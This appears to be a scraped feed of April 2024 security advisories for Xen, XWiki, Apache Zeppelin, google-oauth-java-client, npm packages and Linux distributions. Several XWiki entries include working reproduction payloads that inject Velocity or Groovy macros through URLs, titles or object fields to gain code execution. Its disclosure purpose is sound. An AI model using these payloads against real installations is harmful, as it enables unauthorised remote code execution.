**VULNERABLE SYSTEMS**
All versions of Xen containing the XSA-407 fixes are vulnerable.
See XSAs 407 and 434 for details on which hardware is susceptible to BTC/SRSO.
https://secdb.nttzen.cloud/security-advisory/xen/XSA-455
09.04.2024 18:11:26 | maven | [MAVEN:GHSA-HW42-3568-WJ87] google-oauth-java-client improperly verifies cryptographic signature (high)
### Summary
The vulnerability impacts only users of the `IdTokenVerifier` class. The verify method in `IdTokenVerifier` does not validate the signature before verifying the claims (e.g., iss, aud, etc.). Signature verification makes sure that the token's payload comes from a valid provider, not from someone else. An attacker can provide a compromised token with a modified payload like email or phone number. The token will pass the validation by the library. Once verified, the modified payload can be used by the application. If the application sends the verified `IdToken` to another service as is, like for auth, the risk is low, because the backend of the service is expected to check the signature and fail the request.

Reporter: [Tamjid al Rahat](https://github.com/tamjidrahat), contributor

### Patches
The issue was fixed in the 1.33.3 version of the library.

### Proof of Concept
To reproduce, one needs to call the verify function with an IdToken instance that contains a malformed signature to successfully bypass the checks inside the verify function.
```
/** A default http transport factory for testing */
static class DefaultHttpTransportFactory implements HttpTransportFactory {
  public HttpTransport create() {
    return new NetHttpTransport();
  }
}

// The below token has some modified bits in the signature
private static final String SERVICE_ACCOUNT_RS256_TOKEN_BAD_SIGNATURE =
    "eyJhbGciOiJSUzI1NiIsImtpZCI6IjJlZjc3YjM4YTFiMDM3MDQ4NzA0MzkxNmFjYmYyN2Q3NG"
    + "VkZDA4YjEiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJodHRwczovL2V4YW1wbGUuY29tL2F1ZGllbm"
    + "NlIiwiZXhwIjoxNTg3NjMwNTQzLCJpYXQiOjE1ODc2MjY5NDMsImlzcyI6InNvbWUgaXNzdWVy"
    + "Iiwic3ViIjoic29tZSBzdWJqZWN0In0.gGOQW0qQgs4jGUmCsgRV83RqsJLaEy89-ZOG6p1u0Y26"
    + "FyY06b6Odgd7xXLsSTiiSnch62dl0Lfi9D0x2ByxvsGOCbovmBl2ZZ0zHr1wpc4N0XS9lMUq5RJ"
    + "QbonDibxXG4nC2zroDfvD0h7i-L8KMXeJb9pYwW7LkmrM_YwYfJnWnZ4bpcsDjojmPeUBlACg7tjjOgBFby"
    + "QZvUtaERJwSRlaWibvNjof7eCVfZChE0PwBpZc_cGqSqKXv544L4ttqdCnm0NjqrTATXwC4gYx"
    + "ruevkjHfYI5ojcQmXoWDJJ0-_jzfyPE4MFFdCFgzLgnfIOwe5ve0MtquKuv2O0pgvg";

IdTokenVerifier tokenVerifier =
    new IdTokenVerifier.Builder()
        .setClock(clock)
        .setCertificatesLocation("https://www.googleapis.com/robot/v1/metadata/x509/integration-tests%40chingor-test.iam.gserviceaccount.com")
        .setHttpTransportFactory(new DefaultHttpTransportFactory())
        .build();

// verification will return true despite modified signature for versions <1.33.3
tokenVerifier.verify(IdToken.parse(GsonFactory.getDefaultInstance(), SERVICE_ACCOUNT_RS256_TOKEN_BAD_SIGNATURE));
```

### Remediation and Mitigation
Update to the version 1.33.3 or higher. If the library is used indirectly or cannot be updated for any reason, you can use similar IdToken verifiers provided by Google that already have signature verification. For example:
[google-auth-library-java](https://github.com/googleapis/google-auth-library-java/blob/main/oauth2_http/java/com/google/auth/oauth2/TokenVerifier.java)
[google-api-java-client](https://github.com/googleapis/google-api-java-client/blob/main/google-api-client/src/main/java/com/google/api/client/googleapis/auth/oauth2/GoogleIdTokenVerifier.java)

### Timeline
Date reported: 12 Dec 2021
Date fixed: 13 Apr 2022
Date disclosed: 2 May 2022

### For more information
If you have any questions or comments about this advisory:
* Open an issue in the [google-oauth-java-client](https://github.com/googleapis/google-oauth-java-client) repo
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HW42-3568-WJ87
09.04.2024 16:53:55 | ubuntu | [USN-6701-4] Linux kernel (Azure) vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6701-4

09.04.2024 16:46:16 | ubuntu | [USN-6726-1] Linux kernel vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6726-1

09.04.2024 16:19:04 | ubuntu | [USN-6725-1] Linux kernel vulnerabilities (critical)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6725-1

09.04.2024 21:53:31 | maven | [MAVEN:GHSA-M65C-WMW9-VMPP] Apache Zeppelin: Replacing other users notebook, bypassing any permissions (moderate)
Authentication Bypass by Spoofing vulnerability by replacing existing notes in Apache Zeppelin. This issue affects Apache Zeppelin: from 0.10.1 before 0.11.0. Users are recommended to upgrade to version 0.11.0, which fixes the issue.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-M65C-WMW9-VMPP

09.04.2024 21:53:18 | maven | [MAVEN:GHSA-FRC2-W2CC-X794] Eclipse Kura LogServlet vulnerability (high)
In Eclipse Kura LogServlet component included in versions 5.0.0 to 5.4.1, a specifically crafted request to the servlet can allow an unauthenticated user to retrieve the device logs. Also, downloaded logs may be used by an attacker to perform privilege escalation by using the session id of an authenticated user reported in logs. This issue affects org.eclipse.kura:org.eclipse.kura.web2 version range [2.0.600, 2.4.0], which is included in Eclipse Kura version range [5.0.0, 5.4.1].
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-FRC2-W2CC-X794

09.04.2024 19:28:05 | maven | [MAVEN:GHSA-6623-C6MR-6737] Apache Zeppelin: Denial of service with invalid notebook name (moderate)
Improper Input Validation vulnerability in Apache Zeppelin when creating a new note from Zeppelin's UI. This issue affects Apache Zeppelin from 0.10.1 before 0.11.0. Users are recommended to upgrade to version 0.11.0, which fixes the issue.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-6623-C6MR-6737

09.04.2024 19:23:54 | maven | [MAVEN:GHSA-RR59-H6RH-V84V] Apache Zeppelin SAP: connecting to a malicious SAP server allowed it to perform XXE (moderate)
Improper Input Validation vulnerability in Apache Zeppelin SAP. This issue affects Apache Zeppelin SAP: from 0.8.0 before 0.11.0. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. For more information, the fix already was merged in the source code but Zeppelin decided to retire the SAP component.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-RR59-H6RH-V84V

09.04.2024 19:23:03 | maven | [MAVEN:GHSA-PRVG-RH5H-74JR] Apache Zeppelin CSRF vulnerability in the Credentials page (moderate)
Cross-Site Request Forgery (CSRF) vulnerability in Credential page of Apache Zeppelin allows an attacker to submit malicious request. This issue affects Apache Zeppelin version 0.9.0 and prior versions.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-PRVG-RH5H-74JR

09.04.2024 15:17:25 | ubuntu | [USN-6724-1] Linux kernel vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6724-1

09.04.2024 15:07:28 | ubuntu | [USN-6723-1] Bind vulnerabilities (high)
Bind could be made to crash if it received specially crafted input.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6723-1
09.04.2024 14:50:00 | xen | [XSA-454] x86 HVM hypercalls may trigger Xen bug check
**ISSUE DESCRIPTION**
Unlike 32-bit PV guests, HVM guests may switch freely between 64-bit and other modes. This in particular means that they may set registers used to pass 32-bit-mode hypercall arguments to values outside of the range 32-bit code would be able to set them to.

When processing of hypercalls takes a considerable amount of time, the hypervisor may choose to invoke a hypercall continuation. Doing so involves putting (perhaps updated) hypercall arguments in respective registers. For guests not running in 64-bit mode this further involves a certain amount of translation of the values.

Unfortunately internal sanity checking of these translated values assumes high halves of registers to always be clear when invoking a hypercall. When this is found not to be the case, it triggers a consistency check in the hypervisor and causes a crash.

**IMPACT**
A HVM or PVH guest can cause a hypervisor crash, causing a Denial of Service (DoS) of the entire host.

**VULNERABLE SYSTEMS**
All Xen versions from at least 3.2 onwards are vulnerable. Earlier versions have not been inspected.
Only x86 systems are vulnerable. Arm systems are not vulnerable.
Only HVM or PVH guests can leverage the vulnerability. PV guests cannot leverage the vulnerability.
https://secdb.nttzen.cloud/security-advisory/xen/XSA-454

09.04.2024 19:20:42 | maven | [MAVEN:GHSA-G64R-XF39-Q4P5] Apache Zeppelin Path Traversal vulnerability (moderate)
Improper Input Validation vulnerability in Apache Zeppelin. By adding relative path indicators (e.g. `..`), attackers can see the contents for any files in the filesystem that the server account can access. This issue affects Apache Zeppelin from 0.9.0 before 0.11.0. Users are recommended to upgrade to version 0.11.0, which fixes the issue.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-G64R-XF39-Q4P5

09.04.2024 21:53:10 | maven | [MAVEN:GHSA-V4MM-Q8FV-R2W5] WildFly Elytron: SSRF security issue (high)
A flaw was found in `JwtValidator.resolvePublicKey` in JBoss EAP, where the validator checks jku and sends a HTTP request. During this process, no whitelisting or other filtering behavior is performed on the destination URL address, which may result in a server-side request forgery (SSRF) vulnerability.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-V4MM-Q8FV-R2W5

09.04.2024 04:15:49 | alpinelinux | [ALPINE:CVE-2024-27983] nodejs, nodejs-current vulnerability (high)
[From CVE-2024-27983] An attacker can make the Node.js HTTP/2 server completely unavailable by sending a small amount of HTTP/2 frames packets with a few HTTP/2 frames inside. It is possible to leave some data in nghttp2 memory after reset when headers with HTTP/2 CONTINUATION frame are sent to the server and then a TCP connection is abruptly closed by the client triggering the Http2Session destructor while header frames are still being processed (and stored in memory) causing a race condition.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-27983

09.04.2024 03:00:00 | oraclelinux | [ELSA-2024-1690] varnish security update (important)
varnish
[6.0.13-1]
- new version 6.0.13
- Resolves: RHEL-30378 - varnish:6/varnish: HTTP/2 Broken Window Attack may result in denial of service (CVE-2024-30156)
varnish-modules
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1690

09.04.2024 03:00:00 | oraclelinux | [ELSA-2024-1691] varnish security update (important)
[6.6.2-4.1]
- Resolves: RHEL-30387 - varnish: HTTP/2 Broken Window Attack may result in denial of service (CVE-2024-30156)
[6.6.2-4]
- Add parameters h2_rst_allowance and h2_rst_allowance_period to mitigate CVE-2023-44487
- Resolves: RHEL-12817
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1691

09.04.2024 03:00:00 | redhat | [RHSA-2024:1719] rear security update (moderate)
Relax-and-Recover is a recovery and system migration utility. The utility produces a bootable image and restores from backup using this image. It allows to restore to different hardware and can therefore be also used as a migration utility.

Security Fix(es):
* rear: creates a world-readable initrd (CVE-2024-23301)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1719

09.04.2024 17:39:56 | android | [ASB-A-218495634] Lockdown vs. Screen pinning mode (high)
In multiple functions of KeyguardViewMediator.java, there is a possible way to bypass lockdown mode with screen pinning due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.
https://secdb.nttzen.cloud/security-advisory/android/ASB-A-218495634
10.04.2024 20:16:54 | maven | [MAVEN:GHSA-C2GG-4GQ4-JV5J] XWiki Platform remote code execution from account through UIExtension parameters (critical)
### Impact
Parameters of UI extensions are always interpreted as Velocity code and executed with programming rights. Any user with edit right on any document like the user's own profile can create UI extensions. This allows remote code execution and thereby impacts the confidentiality, integrity and availability of the whole XWiki installation.

To reproduce, edit your user profile with the object editor and add a UIExtension object with the following values:
```
Extension Point ID: org.xwiki.platform.panels.Applications
Extension ID: platform.panels.myFakeApplication
Extension parameters:
label=I got programming right: $services.security.authorization.hasAccess('programming')
target=Main.WebHome
targetQueryString=
icon=icon:bomb
Extension Scope: "Current User".
```
Save the document and open any document. If an application entry with the text "I got programming right: true" is displayed, the attack succeeded; if the code in "label" is displayed literally, the XWiki installation isn't vulnerable.

### Patches
This vulnerability has been patched in XWiki 14.10.19, 15.5.4 and 15.9-RC1.

### Workarounds
We're not aware of any workarounds apart from upgrading.

### References
* https://jira.xwiki.org/browse/XWIKI-21335
* https://github.com/xwiki/xwiki-platform/commit/171e7c7d0e56deaa7b3678657ae26ef95379b1ea
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-C2GG-4GQ4-JV5J

11.04.2024 01:01:58 | maven | [MAVEN:GHSA-HF43-47Q4-FHQ5] XWiki Commons missing escaping of `{` in Velocity escapetool allows remote code execution (critical)
### Impact
The HTML escaping of the escaping tool that is used in XWiki doesn't escape `{`, which, when used in certain places, allows XWiki syntax injection and thereby remote code execution.

To reproduce in an XWiki installation, open `<xwiki-host>/xwiki/bin/view/Panels/PanelLayoutUpdate?place=%7B%7B%2Fhtml%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bvelocity%7D%7D%23evaluate(%24request.eval)%7B%7B%2Fvelocity%7D%7D%7B%7B%2Fasync%7D%7D&eval=Hello%20from%20URL%20Parameter!%20I%20got%20programming%3A%20%24services.security.authorization.hasAccess(%27programming%27)` where `<xwiki-host>` is the URL of your XWiki installation. If this displays `You are not admin on this place Hello from URL Parameter! I got programming: true`, the installation is vulnerable.

### Patches
The vulnerability has been fixed on XWiki 14.10.19, 15.5.5, and 15.9 RC1.

### Workarounds
Apart from upgrading, there is no generic workaround. However, replacing `$escapetool.html` by `$escapetool.xml` in XWiki documents fixes the vulnerability. In a standard XWiki installation, we're only aware of the document `Panels.PanelLayoutUpdate` that exposes this vulnerability; patching this document is thus a workaround. Any extension could expose this vulnerability and might thus require patching, too.

### References
- https://github.com/xwiki/xwiki-commons/commit/b94142e2a66ec32e89eacab67c3da8d91f5ef93a
- https://jira.xwiki.org/browse/XCOMMONS-2828
- https://jira.xwiki.org/browse/XWIKI-21438
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HF43-47Q4-FHQ5

10.04.2024 20:16:19 | npm | [NPM:GHSA-HP8H-7X69-4WMV] zcap has incomplete expiration checks in capability chains. (moderate)
### Impact
When invoking a capability with a chain depth of 2, i.e., it is delegated directly from the root capability, the `expires` property is not properly checked against the current date or other `date` param. This can allow invocations outside of the original intended time period. A zcap still cannot be invoked without being able to use the associated private key material.

### Patches
`@digitalbazaar/zcap` v9.0.1 fixes expiration checking.

### Workarounds
A zcap could be revoked at any time.

### References
https://github.com/digitalbazaar/zcap/pull/82
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-HP8H-7X69-4WMV

10.04.2024 20:15:54 | npm | [NPM:GHSA-9WWP-Q7WQ-JX35] @fastify/secure-session: Reuse of destroyed secure session cookie (high)
### Impact
At the end of the request handling, it will encrypt all data in the session with a secret key and attach the ciphertext as a cookie value with the defined cookie name. After that, the session on the server side is destroyed. When an encrypted cookie with matching session name is provided with subsequent requests, it will decrypt the ciphertext to get the data. The plugin then creates a new session with the data in the ciphertext. Thus theoretically the web instance is still accessing the data from a server-side session, but technically that session is generated solely from a user provided cookie (which is assumed to be non-craftable because it is encrypted with a secret key not known to the user).

The issue exists in the session removal process. In the delete function of the code, when the session is deleted, it is marked for deletion. However, if an attacker could gain access to the cookie, they could keep using it forever.

### Patches
Fixed in 56d66642ecc633cff0606927601e81cdac361370.
Update to v7.3.0.

### Workarounds
Include a "last update" field in the session, and treat "old sessions" as expired. Make sure to configure your cookie as "http only".

### References
* https://hackerone.com/reports/2374253
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9WWP-Q7WQ-JX35
11.04.2024 01:01:48maven[MAVEN:GHSA-R5VH-GC3R-R24W] XWiki Platform CSRF remote code execution through the realtime HTML Converter API (critical)### ImpactWhen the realtime editor is installed in XWiki, it allows arbitrary remote code execution with the interaction of an admin user with programming right. More precisely, by getting an admin user to either visit a crafted URL or to view an image with this URL that could be in a comment, the attacker can get the admin to execute arbitrary XWiki syntax including scripting macros with Groovy or Python code. This compromises the confidentiality, integrity and availability of the whole XWiki installation.To reproduce on an XWiki installation, as an admin, click on `<xwiki-host>/xwiki/bin/get/RTFrontend/ConvertHTML?wiki=xwiki&space=Main&page=WebHome&text=%7B%7Bvelocity%7D%7D%24logtool.error%28%22Hello%20from%20Velocity%20%21%22%29%7B%7B%2Fvelocity%7D%7D`. If the error "Hello from Velocity!" gets logged then the installation is vulnerable.### PatchesThis vulnerability has been patched in XWiki 14.10.19, 15.5.4 and 15.9.### WorkaroundsUpdate `RTFrontend.ConvertHTML` following this [patch](https://github.com/xwiki/xwiki-platform/commit/4896712ee6483da623f131be2e618f1f2b79cb8d#diff-32a2a63950724b24e63587570cd95a41cf689111b8ba61c48dabee9effec6d61).This will, however, break some synchronization processes in the realtime editor, so upgrading should be the preferred way on installations where this editor is used.### References* https://jira.xwiki.org/browse/XWIKI-21424* https://github.com/xwiki/xwiki-platform/commit/4896712ee6483da623f131be2e618f1f2b79cb8dhttps://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-R5VH-GC3R-R24W
11.04.2024 01:01:41maven[MAVEN:GHSA-CV55-V6RW-7R5V] XWiki Platform remote code execution from account via custom skins support (critical)### ImpactAny user who can edit any page like their profile can create a custom skin with a template override that is executed with programming right, thus allowing remote code execution. To reproduce, as a user without edit, script or admin right, add an object of class `XWiki.XWikiSkins` to your profile. Name it whatever you want and set the Base Skin to `flamingo`.Add an object of class `XWikiSkinFileOverrideClass` and set the path to `macros.vm` and the content to:```#macro(mediumUserAvatar $username) #resizedUserAvatar($username 50) $services.logging.getLogger('Skin').error("I got programming: $services.security.authorization.hasAccess('programming')")#end```Back to your profile, click `Test this skin`. Force a refresh, just in case.If the error "Skin - I got programming: true" gets logged, the installation is vulnerable.### PatchesThis has been patched in XWiki 14.10.19, 15.5.4 and 15.10RC1.### WorkaroundsWe're not aware of any workaround except upgrading.### References* https://jira.xwiki.org/browse/XWIKI-21478* https://github.com/xwiki/xwiki-platform/commit/3d4dbb41f52d1a6e39835cfb1695ca6668605a39 (>= 15.8 RC1)* https://github.com/xwiki/xwiki-platform/commit/da177c3c972e797d92c1a31e278f946012c41b56 (< 15.8 RC1)https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CV55-V6RW-7R5V
11.04.2024 01:01:33 | maven | [MAVEN:GHSA-37M4-HQXV-W26G] XWiki Platform CSRF remote code execution through scheduler job's document reference (critical)

### Impact

By creating a document with a specially crafted document reference and an `XWiki.SchedulerJobClass` XObject, it is possible to execute arbitrary code on the server whenever an admin visits the scheduler page or the scheduler page is referenced, e.g., via an image in a comment on a page in the wiki.

To reproduce on an XWiki installation, click on this link to create a new document: `<xwiki-host>/xwiki/bin/view/%22%3E%5D%5D%7B%7B%2Fhtml%7D%7D%7B%7Basync%20context%3D%22request/parameters%22%7D%7D%7B%7Bvelocity%7D%7D%23evaluate%28%24request/eval%29/`. Then, add to this document an object of type `XWiki.SchedulerJobClass`. Finally, as an admin, go to `<xwiki-host>/xwiki/bin/view/Scheduler/?eval=$services.logging.getLogger(%22attacker%22).error(%22Hello%20from%20URL%20Parameter!%20I%20got%20programming:%20$services.security.authorization.hasAccess(%27programming%27)%22)`. If the logs contain `ERROR attacker - Hello from URL Parameter! I got programming: true`, the installation is vulnerable.

### Patches

The vulnerability has been fixed on XWiki 14.10.19, 15.5.5, and 15.9.

### Workarounds

Modify the Scheduler.WebHome page following this [patch](https://github.com/xwiki/xwiki-platform/commit/f16ca4ef1513f84ce2e685d4a05d689bd3a2ab4c#diff-1e2995eacccbbbdcc4987ff64f46ac74837d166cf9e92920b4a4f8af0f10bd47).

### References

- https://jira.xwiki.org/browse/XWIKI-21416
- https://github.com/xwiki/xwiki-platform/commit/f16ca4ef1513f84ce2e685d4a05d689bd3a2ab4c

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-37M4-HQXV-W26G

11.04.2024 01:01:26 | maven | [MAVEN:GHSA-J2R6-R929-V6GF] XWiki Platform CSRF in the job scheduler (moderate)

### Impact

It is possible to schedule/trigger/unschedule existing jobs by having an admin visit the Job Scheduler page through a predictable URL, for example by embedding such a URL in any content as an image.

To reproduce in an XWiki installation, open `<xwiki-host>:/xwiki/bin/view/Scheduler/?do=trigger&which=Scheduler.NotificationEmailDailySender` as a user with admin rights. If there is no error message indicating that the CSRF token is invalid, the installation is vulnerable.

### Patches

The vulnerability has been fixed on XWiki 14.10.19, 15.5.5, and 15.9.

### Workarounds

Modify the Scheduler.WebHome page following this [patch](https://github.com/xwiki/xwiki-platform/commit/f16ca4ef1513f84ce2e685d4a05d689bd3a2ab4c#diff-1e2995eacccbbbdcc4987ff64f46ac74837d166cf9e92920b4a4f8af0f10bd47).

### References

- https://jira.xwiki.org/browse/XWIKI-20851
- https://github.com/xwiki/xwiki-platform/commit/f16ca4ef1513f84ce2e685d4a05d689bd3a2ab4c

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-J2R6-R929-V6GF

11.04.2024 01:01:18 | maven | [MAVEN:GHSA-XM4H-3JXR-M3C6] XWiki Platform: Remote code execution through space title and Solr space facet (critical)

### Impact

By creating a document with a specially crafted title, it is possible to trigger remote code execution in the (Solr-based) search in XWiki. This allows any user who can edit the title of a space (all users by default) to execute any Groovy code in the XWiki installation, which compromises the confidentiality, integrity and availability of the whole XWiki installation.

To reproduce, as a user without script nor programming rights, create a document with title `{{/html}}{{async}}{{groovy}}println("Hello from Groovy Title!"){{/groovy}}{{/async}}` and content `Test Document`. Using the search UI, search for `"Test Document"`, then deploy the `Location` facet on the right of the screen, next to the search results. The installation is vulnerable if you see an item such as:

```
Hello from Groovy Title!</a><div class="itemCount">1</div></li></ul>{{/html}}
```

### Patches

This has been patched in XWiki 14.10.20, 15.5.4 and 15.10 RC1.

### Workarounds

Modify the `Main.SolrSpaceFacet` page following this [patch](https://github.com/xwiki/xwiki-platform/commit/acba74c149a041345b24dcca52c586f872ba97fb#diff-22dd1949ed9019a39f2550f5a953a1a967c30a374dc9eeddb74069bf229b17d5).

### References

* https://jira.xwiki.org/browse/XWIKI-21471
* https://github.com/xwiki/xwiki-platform/commit/acba74c149a041345b24dcca52c586f872ba97fb
* https://github.com/xwiki/xwiki-platform/commit/74e301c481e69eeea674dac7fed6af3614cf08c5

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XM4H-3JXR-M3C6

11.04.2024 01:01:11 | maven | [MAVEN:GHSA-XXP2-9C9G-7WMJ] XWiki Platform: Remote code execution from edit in multilingual wikis via translations (critical)

### Impact

In multilingual wikis, translations can be edited by any user who has edit right, circumventing the rights that are normally required for authoring translations (script right for user-scope translations, wiki admin for translations on the wiki). This can be exploited for remote code execution if the translation value is not properly escaped where it is used.

To reproduce, in a multilingual wiki, as a user without script or admin right, edit a translation of `AppWithinMinutes.Translations` and in the line `platform.appwithinminutes.description=` add `{{async}}{{groovy}}println("Hello from Translation"){{/groovy}}{{/async}}` at the end. Then open the App Within Minutes home page (`AppWithinMinutes.WebHome`) in the same locale. If translations are still working and "Hello from Translation" is displayed at the end of the introduction, the installation is vulnerable.

### Patches

This has been patched in XWiki 14.10.20, 15.5.4 and 15.10RC1.

### Workarounds

We're not aware of any workaround except restricting edit right on documents that contain translations.

### References

* https://jira.xwiki.org/browse/XWIKI-21411
* https://github.com/xwiki/xwiki-platform/commit/c4c8d61c30de72298d805ccc82df2a307f131c54

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XXP2-9C9G-7WMJ

11.04.2024 01:01:01 | maven | [MAVEN:GHSA-2858-8CFX-69M9] XWiki Platform: Remote code execution as guest via DatabaseSearch (critical)

### Impact

XWiki's database search allows remote code execution through the search text. This allows remote code execution for any visitor of a public wiki or user of a closed wiki, as the database search is by default accessible for all users. This impacts the confidentiality, integrity and availability of the whole XWiki installation.

To reproduce on an instance, without being logged in, go to `<hostname>/xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20`. If the title of the RSS channel contains `Hello from search text:42`, the instance is vulnerable.

### Patches

This vulnerability has been patched in XWiki 14.10.20, 15.5.4 and 15.10RC1.

### Workarounds

It is possible to manually apply [this patch](https://github.com/xwiki/xwiki-platform/commit/95bdd6cc6298acdf7f8f21298d40eeb8390a8565#diff-ef3314b8bb489e5368618ea1940c59098b18ec2246cc65fe337ae636de87e404) to the page `Main.DatabaseSearch`. Alternatively, unless database search is explicitly used by users, this page can be deleted, as it is not the default search interface of XWiki.

### References

* https://jira.xwiki.org/browse/XWIKI-21472
* https://github.com/xwiki/xwiki-platform/commit/95bdd6cc6298acdf7f8f21298d40eeb8390a8565

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2858-8CFX-69M9

11.04.2024 01:00:52 | maven | [MAVEN:GHSA-VXWR-WPJV-QJQ7] XWiki Platform: Privilege escalation (PR) from user registration through PDFClass (critical)

### Impact

Remote code execution is possible via PDF export templates.

To reproduce on an installation, register a new user account with username `PDFClass` if `XWiki.PDFClass` does not exist. On `XWiki.PDFClass`, use the class editor to add a "style" property of type "TextArea" and content type "Plain Text". Then, add an object of class `PDFClass` and set the "style" attribute to `$services.logging.getLogger('PDFClass').error("I got programming: $services.security.authorization.hasAccess('programming')")`. Finally, go to `<host>/xwiki/bin/export/Main/WebHome?format=pdf&pdftemplate=XWiki.PDFClass`. If the logs contain "ERROR PDFClass - I got programming: true", the instance is vulnerable.

### Patches

This vulnerability has been patched in XWiki 14.10.20, 15.5.4 and 15.10-rc-1.

### Workarounds

If PDF templates are not typically used on the instance, an administrator can create the document `XWiki.PDFClass` and block editing of it, after making sure that it does not contain a `style` attribute. Otherwise, the instance needs to be updated.

### References

- https://jira.xwiki.org/browse/XWIKI-21337
- https://github.com/xwiki/xwiki-platform/commit/d28e21a670c69880b951e415dd2ddd69d273eae9

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-VXWR-WPJV-QJQ7

11.04.2024 01:00:41 | maven | [MAVEN:GHSA-34FJ-R5GQ-7395] XWiki Platform: Remote code execution from account via SearchSuggestSourceSheet (critical)

### Impact

Any user with edit right on any page can execute any code on the server by adding an object of type `XWiki.SearchSuggestSourceClass` to their user profile or any other page. This compromises the confidentiality, integrity and availability of the whole XWiki installation.

To reproduce on an instance, as a user without script nor programming rights, add an object of type `XWiki.SearchSuggestSourceClass` to your profile page. On this object, set every possible property to `}}}{{async}}{{groovy}}println("Hello from Groovy!"){{/groovy}}{{/async}}` (i.e., name, engine, service, query, limit and icon). Save and display the page, then append `?sheet=XWiki.SearchSuggestSourceSheet` to the URL. If any property displays as `Hello from Groovy!}}}`, then the instance is vulnerable.

### Patches

This vulnerability has been patched in XWiki 14.10.20, 15.5.4 and 15.10 RC1.

### Workarounds

[This patch](https://github.com/xwiki/xwiki-platform/commit/6a7f19f6424036fce3d703413137adde950ae809#diff-67b473d2b6397d65b7726c6a13555850b11b10128321adf9e627e656e1d130a5) can be manually applied to the document `XWiki.SearchSuggestSourceSheet`.

### References

* https://jira.xwiki.org/browse/XWIKI-21474
* https://github.com/xwiki/xwiki-platform/commit/6a7f19f6424036fce3d703413137adde950ae809

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-34FJ-R5GQ-7395

11.04.2024 00:42:01 | maven | [MAVEN:GHSA-V782-XR4W-3VQX] XWiki Platform: Password hash might be leaked by diff once the xobject holding them is deleted (moderate)

### Impact

It is possible to access the hash of a password by using the diff feature of the history whenever the object storing the password is deleted. Using that vulnerability, it's possible for an attacker to have access to the password hash of a user if they have rights to edit the user's page. Now, with the default right scheme in XWiki, this vulnerability is normally prevented on user profiles, except for users with Admin rights. Note that this vulnerability also impacts any extensions that might use passwords stored in xobjects: for those use cases it depends on the rights of those pages.

There is currently no way to be 100% sure that this vulnerability has been exploited, as an attacker with enough privilege could have deleted the revision where the xobject was deleted after rolling back the deletion. But again, this operation requires high privileges on the target page (Admin right). A page with a user password xobject which has in its history a revision where the object has been deleted should be considered at risk, and the password should be changed there.

### Patches

The vulnerability has been patched in XWiki 14.10.19, 15.5.4 and 15.9-rc-1 by performing a better check before displaying data of a diff, to ensure it's not coming from a password field.

### Workarounds

Admins should ensure that the user pages are properly protected: the edit right shouldn't be allowed for users other than Admin and the owner of the profile (which is the default right). Now, there's not much workaround possible for a privileged user other than upgrading XWiki.

### References

* JIRA ticket: https://jira.xwiki.org/browse/XWIKI-19948
* Commit: https://github.com/xwiki/xwiki-platform/commit/f1eaec1e512220fabd970d053c627e435a1652cf

### For more information

If you have any questions or comments about this advisory:

* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:security@xwiki.org)

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-V782-XR4W-3VQX

10.04.2024 19:38:15 | ubuntu | [USN-6728-1] Squid vulnerabilities (high)
Several security issues were fixed in Squid.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6728-1

11.04.2024 01:05:08 | maven | [MAVEN:GHSA-JPMX-996V-48FM] WildFly Elytron: OIDC app attempting to access the second tenant, the user should be prompted to log (high)
